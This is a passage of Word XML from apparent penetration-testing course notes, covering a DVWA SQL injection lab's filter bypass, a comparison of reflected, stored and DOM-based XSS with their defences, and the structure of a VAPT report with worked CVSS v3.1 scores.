        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, this entire sequence works directly through the browser's URL or form field with no obstruction. On </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, DVWA applies basic input filtering (commonly stripping single quotes submitted via GET), so the same payloads are instead sent through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after intercepting the POST request, allowing the tester to bypass client-side-only restrictions by directly editing the raw POST body — demonstrating that filtering applied in the wrong place (or incompletely) gives a false sense of security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each extracted password (typically shown as an MD5 hash on DVWA) would then, in a full assessment, be sent for offline cracking analysis and reported with a recommendation to migrate to parameterised queries and a modern password hashing algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compare Reflected XSS, Stored XSS and DOM-based XSS in terms of where the payload is processed, who it affects, and how each should be tested and defended against.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a payload submitted as part of a request (commonly a URL parameter) is echoed back unescaped in the immediate response. It is tested by submitting a script payload into an input field or URL parameter and observing whether it executes in the response page; it only affects a victim who is individually tricked into clicking a specially crafted link, making it a one-at-a-time attack that typically relies on social engineering to deliver the link.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a payload is saved on the server — for example as a comment or guestbook entry — and is then served, unescaped, to every subsequent visitor of that page. It is tested by submitting a payload through a feature that persists data (like a comment form) and then revisiting the page as a different session to see if it fires automatically. It is considered the most dangerous of the three because a single successful injection can compromise every visitor who views the content afterward, with no further action needed by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs entirely within client-side JavaScript: the vulnerable code reads untrusted data (for example from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">location.hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">document.URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) and writes it directly into the page's DOM without sanitisation, and the payload may never even be sent to the server. It requires reviewing the page's JavaScript source (or using a tool like browser DevTools or an automated DOM-XSS scanner) rather than simply observing server responses, since server-side logs and even network traffic may show nothing unusual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In all three cases, the primary defence is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">output encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ensuring any untrusted data written into HTML, JavaScript or attribute contexts is properly escaped for that context before rendering. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adds a strong secondary layer by restricting which scripts the browser will execute even if an injection occurs, and for DOM-based XSS specifically, safe DOM APIs (such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) and avoiding direct use of untrusted data in dangerous JavaScript sinks are essential additional controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit V — VAPT Reporting, Risk Assessment &amp; Professional Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical skill is wasted if findings cannot be communicated clearly, scored defensibly, and acted on. This unit covers report structure, worked CVSS calculations, risk visualisation, remediation strategy, professional ethics, and how this course maps onto industry certifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Penetration Test Report Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A penetration test is only as useful as its final report. A professional report follows a consistent structure:</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2047"/>
        <w:gridCol w:w="7699"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7699"/>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Contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Cover Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="769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Tester name, date, target, scope, and classification (e.g. Confidential)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Executive Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7699"/>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 one-page, non-technical overview for managers: what was found, the overall risk level, and the top 3 recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Scope &amp; Methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="769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Tools used, testing approach, and timeframe — so the client knows exactly what was and was not tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Technical Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7699"/>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One entry per vulnerability, each with: title, severity (CVSS v3.1 score plus a Critical/High/Medium/Low/Informational rating), affected system, description, proof-of-concept evidence (e.g. a screenshot), business impact, remediation recommendation, and a CVE/CWE reference where applicable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Risk Heat Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="769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 visual plot of findings by likelihood versus impact, helping the client see priorities at a glance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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Remediation Priority Table / Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7699"/>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 prioritised plan for fixing findings, often grouped by how quickly each should be addressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 CVSS v3.1 Base Score — Worked Examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculating a CVSS base score means rating each metric from Unit II (Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, and the C/I/A impacts) and combining them using the official CVSS v3.1 formula, which weighs network-reachable, low-effort, high-impact issues the highest.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Example 1 — A network-exploitable backdoor (syllabus example)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> an unauthenticated backdoor reachable over the network, giving full remote code execution.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Metric choices:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attack Vector: Network, Attack Complexity: Low, Privileges Required: None, User Interaction: None, Scope: Unchanged, Confidentiality: High, Integrity: High, Availability: High.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector string:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Resulting base score: 9.8 (Critical).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Every factor that makes exploitation easy and damaging is present at once — reachable from anywhere, no special conditions, no credentials, no victim action, and complete compromise of the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Example 2 — A stored XSS (syllabus example)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> a stored XSS allowing session/cookie theft from any visitor who views an infected page.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Metric choices:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attack Vector: Network, Attack Complexity: Low, Privileges Required: None, User Interaction: Required (a victim must view the page), Scope: Changed (the script can affect the victim's browser session, outside the vulnerable component's own security scope), Confidentiality: Low, Integrity: Low, Availability: None.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector string:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Resulting base score: approximately 6.1 (Medium).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Although also reachable over the network, the requirement for user interaction and the partial (not full) impact place it well below the backdoor's score, even though both are “network” issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2F5597" w:sz="6"/>
          <w:left w:val="single" w:color="2F5597" w:sz="6"/>
          <w:bottom w:val="single" w:color="2F5597" w:sz="6"/>
          <w:right w:val="single" w:color="2F5597" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
